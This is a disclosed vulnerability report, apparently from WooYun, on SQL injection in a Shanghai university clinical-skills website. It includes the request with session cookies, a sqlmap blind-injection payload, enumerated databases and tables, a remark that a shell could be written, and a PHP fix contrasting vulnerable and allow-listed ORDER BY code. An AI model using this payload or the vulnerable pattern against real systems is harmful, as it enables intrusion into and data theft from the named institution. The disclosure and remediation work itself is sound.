WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2015-12-07: Details sent to the vendor; awaiting vendor handling
2015-12-08: Vendor confirmed; details disclosed to the vendor only
2015-12-18: Details disclosed to core white hats and domain experts
2015-12-28: Details disclosed to regular white hats
2016-01-07: Details disclosed to intern white hats
2016-01-21: Details disclosed to the public
RT (see title).
http://cstc.shutcm.edu.cn/ Clinical Skills Training Center, Shanghai University of Traditional Chinese Medicine
GET /index.php?option=com_gvsunvd&order=1&page=1&query=&range=all&sort=desc&type=1&view=search HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://cstc.shutcm.edu.cn
Cookie: 4b1e854185ff407f299fee72cc9f0083=lhuc2mdi1gbs7oi90nhf48c197; 4061268b622faf5442048572085f9200=774him6v53jlr7eogaee1qlh57; MoodleSession=iklt3ctdj48f51hq77vq6t8or1; JSESSIONID=8E66120270E1133222F11778AFA37BC7
Host: cstc.shutcm.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
The order parameter is injectable.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: order (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: option=com_gvsunvd&order=1 RLIKE (SELECT (CASE WHEN (4952=4952) THEN 1 ELSE 0x28 END))&page=1&query=&range=all&sort=desc&type=1&view=search
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5
current user: 'root@%'
current database: 'cstc'
current user is DBA: True
available databases [7]:
[*] cstc
[*] information_schema
[*] moodle
[*] mysql
[*] performance_schema
[*] survey
[*] test
back-end DBMS: MySQL 5
[13:37:16] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[13:37:16] [INFO] fetching tables for database: 'cstc'
[13:37:16] [INFO] fetching number of tables for database 'cstc'
[13:37:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:37:16] [INFO] retrieved: 100
[13:37:22] [INFO] retrieved: hji2n_acepolls_options
[13:38:36] [INFO] retrieved: hji2n_acepolls_polls
[13:39:04] [INFO] retrieved: hji2n_acepolls_votes
[13:39:32] [INFO] retrieved: hji2n_assets
[13:39:54] [INFO] retrieved: hji2n_associations
[13:40:32] [INFO] retrieved: hji2n_banner_clients
[13:41:23] [INFO] retrieved: hji2n_banner_tracks
[13:42:29] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[13:41:52] [INFO] retrieved: hji2n_banners
[13:42:35] [INFO] retrieved: hji2n_categories
[13:43:11] [INFO] retrieved: hji2n_contact_details
[13:44:01] [INFO] retrieved: hji2n_content
[13:44:19] [INFO] retrieved: hji2n_content_frontpage
[13:45:01] [INFO] retrieved: hji2n_content_rating
[13:45:31] [INFO] retrieved: hji2n_core_log_searches
[13:46:26] [INFO] retrieved: hji2n_cstc_bases
[13:47:01] [INFO] retrieved: hji2n_cstc_colleges
[13:47:38] [INFO] retrieved: hji2n_cstc_degrees
[13:48:45] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[13:48:13] [INFO] retrieved: hji2n_cstc_disciplines
[13:49:26] [INFO] retrieved: hji2n_cstc_dissubjects
[13:50:01] [INFO] retrieved: hji2n_cstc_durations
[13:50:37] [INFO] retrieved: hji2n_cstc_educations
[13:52:15] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[13:51:21] [INFO] retrieved: hji2n_cstc_examrecords
[13:52:35] [INFO] retrieved: hji2n_cstc_examrooms
[13:53:02] [INFO] retrieved: hji2n_cstc_exams
[13:53:16] [INFO] retrieved: hji2n_cstc_langmaps
[13:53:50] [INFO] retrieved: hji2n_cstc_mapexaminer
[13:54:40] [INFO] retrieved: hji2n_cstc_mapquestion
[13:55:18] [INFO] retrieved: hji2n_cstc_mapquestiongroup
[13:56:23] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[13:55:49] [INFO] retrieved: hji2n_cstc_provinces
[13:58:10] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[13:57:01] [INFO] retrieved: hji2n_cstc_questiongroups
[13:58:26] [INFO] retrieved: hji2n_cstc_questionmedias
[13:58:57] [INFO] retrieved: hji2n_cstc_questions
[13:59:14] [INFO] retrieved: hji2n_cstc_rooms
[13:59:39] [INFO] retrieved: hji2n_cstc_students
[14:00:14] [INFO] retrieved: hji2n_cstc_subjects
[14:00:45] [INFO] retrieved: hji2n_cstc_subquesti
The database user has DBA privileges, so writing a shell would be fairly easy; the account's privileges should be lowered. Injection exists in several places.
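The finding above is a blind injection in an ORDER BY clause, the one place a prepared statement cannot help because column names and sort directions are not bindable values. As an added illustration (not code from the report or from the com_gvsunvd component; table and column names are assumed), the following PHP shows the vulnerable concatenation pattern next to a hardened version that maps the order and sort parameters onto a fixed allow-list and binds the remaining user value with PDO.

```php
<?php
// Added illustration, not code from the com_gvsunvd component or the report.
// The table "videos" and its columns are assumed for this example.

// Vulnerable pattern: the request parameters land verbatim in the ORDER BY clause.
// Neither a column position nor a direction keyword can be bound as a prepared
// statement parameter, so string concatenation here is a classic blind-injection sink
// (the "ORDER BY clause" technique sqlmap reported above).
function buildQueryVulnerable(array $get): string
{
    $order = $get['order'] ?? '1';
    $sort  = $get['sort']  ?? 'desc';
    return "SELECT id, title FROM videos WHERE type = 1 ORDER BY $order $sort";
}

// Hardened pattern: the untrusted values only select an entry from a server-side
// allow-list; anything that is not a known key falls back to a safe default.
const ORDER_COLUMNS = ['1' => 'id', '2' => 'title', '3' => 'created'];
const SORT_DIRS     = ['asc' => 'ASC', 'desc' => 'DESC'];

function buildQuerySafe(array $get): string
{
    $col = ORDER_COLUMNS[(string)($get['order'] ?? '1')] ?? 'id';
    $dir = SORT_DIRS[strtolower((string)($get['sort'] ?? 'desc'))] ?? 'DESC';
    // $col and $dir are now literals chosen by the server, never request text.
    return "SELECT id, title FROM videos WHERE type = :type ORDER BY $col $dir";
}

// The remaining user-controlled value (type) is a real data value, so it is bound
// through PDO instead of being concatenated into the SQL string.
function fetchVideos(PDO $pdo, array $get): array
{
    $stmt = $pdo->prepare(buildQuerySafe($get));
    $stmt->bindValue(':type', (int)($get['type'] ?? 1), PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

Two points from the report carry over to this fix. First, the allow-list belongs in the application code, not in a web-application firewall rule, because a blind ORDER BY injection needs no quotes or comment characters that a filter would catch. Second, the query above runs correctly under a database account that has only SELECT on the application's own tables; the report's 'root@%' DBA account is what turns a read-only injection into a potential shell, so lowering that account's privileges is an independent mitigation regardless of how the code is fixed.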
Severity level: Medium
Vulnerability Rank: 6
Confirmed at: 2015-12-08 12:24
The database port has been closed by the system firewall and is no longer reachable from the campus network.
None yet.